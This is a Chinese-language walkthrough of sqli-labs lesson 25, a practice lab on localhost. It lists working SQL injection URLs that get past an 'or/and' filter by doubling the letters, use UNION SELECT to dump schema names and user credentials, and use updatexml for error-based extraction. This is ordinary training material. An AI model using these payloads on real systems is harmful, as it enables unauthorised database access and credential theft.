less25

1. http://localhost:8001/sqli-labs/less-25/?id=1顯示正常
2. http://localhost:8001/sqli-labs/less-25/?id=1' 此時報錯，說明存在漏洞
3. http://localhost:8001/sqli-labs/less-25/?id=1' order by 3 --+ 使用order by 語句發現報錯，無法使用。通過自己的註釋發現or被過濾掉了。

SELECT * FROM users WHERE id='1' der by 3 -- ' LIMIT 0,1
4. Hint: Your Input is Filtered with following result: 1' der by 3 --網頁裡，作者給出了一個提示，發現or被過濾了，我們嘗試雙寫
5.http://localhost:8001/sqli-labs/less-25/?id=1' oorrder by 1 --+ 返回正常，可以進行測試，最後知道有3列
6. 雙寫的情況下，我們開始測試
1.http://localhost:8001/sqli-labs/less-25/?id=-1' union select 1,2,3 --+ 獲得回顯位置
2.http://localhost:8001/sqli-labs/less-25/?id=-1' union select 1,2,schema_name from infoor

rmation_schema.schemata --+ 根據提示我們可以到所有的or都被替換了，所以所有位置的or都需要寫兩次
3.http://localhost:8001/sqli-labs/less-25/?id=-1' union select 1,2,group_concat(schema_name) from infoorrmation_schema.schemata --+ 取出所有的庫
4.http://localhost:8001/sqli-labs/less-25/?id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=0x7365637572697479--+取出所有的表
5.http://localhost:8001/sqli-labs/less-25/?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name=0x7573657273--+ 取出所有的欄位
6.http://localhost:8001/sqli-labs/less-25/?id=-1' union select 1,2,group_concat(concat_ws(0x7e,username,passwoorrd)) from security.users--+ 取出欄位中的值
當我們使用or ->||的時候：
1.http://localhost:8001/sqli-labs/less-25/?id=-1' oorr 1=1 --+ 判斷存在注入
2.http://localhost:8001/sqli-labs/less-25/?id=-1' oorr updatexml(1,concat(0x7e,(database()),0x7e),1) --+ 爆出當前資料庫
3.http://localhost:8001/sqli-labs/less-25/?id=-1' oorr updatexml(1,concat(0x7e,(select schema_name from infoorrmation_schema.schemata limit 0,1),0x7e),1) --+ 遍歷爆出所有的資料，繼續使用即可，這裡不可以使用group_concat()，因為資料顯示不完整

less25a